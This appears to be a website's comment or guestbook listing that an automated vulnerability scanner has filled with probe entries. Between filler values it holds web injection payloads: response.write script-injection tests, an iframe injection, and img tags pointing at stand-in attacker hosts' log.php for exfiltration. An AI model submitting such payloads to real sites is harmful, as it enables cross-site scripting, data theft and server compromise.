  2021-05-06 07:49:55


  1


 • pHqghUme

  2021-05-06 07:49:54


  1


 • pHqghUme

  2021-05-06 07:49:54


  '+response.write(9028633*9268362)+'


 • pHqghUme

  2021-05-06 07:49:53


  1


 • pHqghUme

  2021-05-06 07:49:53


  response.write(9028633*9268362)


 • "+response.write(9876994*9010392)+"

  2021-05-06 07:49:52


  1


 • '+response.write(9876994*9010392)+'

  2021-05-06 07:49:51


  1


 • response.write(9876994*9010392)

  2021-05-06 07:49:50


  1


 • pHqghUme

  2021-05-06 07:49:49


  1


 • pHqghUme

  2021-05-06 07:49:49


  1


 • pHqghUme

  2021-05-06 07:49:49


  1


 • pHqghUme

  2021-05-06 07:49:48


  1


 • pHqghUme

  2021-05-06 07:49:47


  1


 • pHqghUme

  2021-05-06 07:49:47


  6p18lqVq


 • pHqghUme

  2021-05-06 07:49:46


  1


 • wkbjxvJD

  2021-05-06 07:49:46


  1


 • pHqghUme

  2021-05-06 07:49:45


  1


 • pHqghUme

  2021-05-06 07:49:45


  1


 • pHqghUme

  2021-05-06 07:49:44


  1


 • pHqghUme

  2021-05-06 07:48:35


  1


 • pHqghUme

  2021-05-06 07:48:12


  1


 • pHqghUme

  2021-05-06 07:47:59


  1p4iG3RLO


 • 1cEVGEy2O

  2021-05-06 07:47:57


  1


 • pHqghUme

  2021-05-06 07:47:56


  1


 • pHqghUme

  2021-05-06 07:47:55


  1


 • pHqghUme

  2021-05-06 07:20:15


  1


 • pHqghUme

  2021-05-06 03:09:06


  1<1NPkBa<


 • pHqghUme

  2021-05-06 03:09:00


  1<img sRc='http://attacker-9677/log.php?


 • pHqghUme

  2021-05-06 03:08:53


  1<ZhyrZL x=9402>


 • pHqghUme<MPLAHi<

  2021-05-06 03:08:46


  1


 • pHqghUme

  2021-05-06 03:08:42


  1<ifRAme sRc=9175.com></IfRamE>


 • pHqghUme<img sRc='http://attacker-9830/log.php?

  2021-05-06 03:08:34


  1